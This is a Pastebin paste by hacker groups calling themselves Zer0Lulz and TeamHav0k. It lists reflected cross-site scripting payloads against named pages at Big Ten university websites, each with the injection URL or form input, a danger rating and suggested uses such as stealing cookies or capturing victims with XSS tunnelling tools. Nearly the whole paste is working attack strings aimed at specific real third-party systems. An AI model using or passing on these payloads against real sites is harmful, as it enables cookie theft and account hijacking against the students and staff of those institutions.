Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Target: The Big 10
- Zer0Lulz & TeamHav0k - #OP Big10 or "Big10P"
- "Big10P was an operation to make colleges and universities aware that even the best colleges in the world are still insecure"
- --------
- Northwestern uinv
- offices.northwestern.edu/search?search_terms="><script>alert('Big10P')</script>&submit=Search
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
- Purdue univ
- https://www2.itap.purdue.edu/msds/
- input into searchbar: <script>alert("Big1OP)</script>
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
- University of Illinois
- https://www-s2.education.illinois.edu/intranet/usrmgr/login/default.asp
- Syntax: use, "><script>alert(String.fromCharCode(66,105,103,49,79,80))</script> in the login boxes
- Danger Level: Low
- Usage: non
- University of Michigan
- https://contact.cl.msu.edu/contact.php?service=msuweb
- Syntax: Use, </span><input type="text" AUTOFOCUS onfocus=alert("1")> then submit the form.
- Danger Level: High
- Usage: Could be used to steal the cookies of who ever views the report.
- Penn State
- http://www.events.psu.edu/cgi-bin/cal/webevent.cgi?cmd=login&ncmd=XSS" /><img src=1 onerror=alert(String.fromCharCode(88,83,83,32,66,121,32,83,113,117,105,114,109,121,66,101,97,115,116)) />
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
- University of Minnesota
- http://www.umn.edu/lookup?SET_INSTITUTION=UMNTC&CN=Test"><script>alert("Big1OP")</script>&type=name&campus=a&role=any&submit=Search+people
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
- University of Wisconsin
- http://www.wisc.edu/search/?cx=001601028090761970182:2g0iwqsnk2m&cof=FORID:10&q=HIII"+AUTOFOCUS+onfocus=alert("Big1OP")>
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
- Ohio State
- Target: https://directory.osu.edu/findpeople.php
- Syntax: </span><input type="text" AUTOFOCUS onfocus=alert("Big1OP")>
- Danger Level: Low
- Usage: None
- University of Iowa
- https://login.uiowa.edu/uip/login.page?service=<script>alert("Big10P");</script>
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
- Indiana University
- http://search.kelley.iu.edu/search?q=<script>alert('Big10P')</script>&go.x=0&go.y=0&site=kelley_collection&client=kelley_collection&proxystylesheet=kelley_collection&restrict=&output=xml_no_dtd
- Danger Level: High
- Usage: Can be used to steal cookies, claim XSS Tunnel or XSSF victims.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement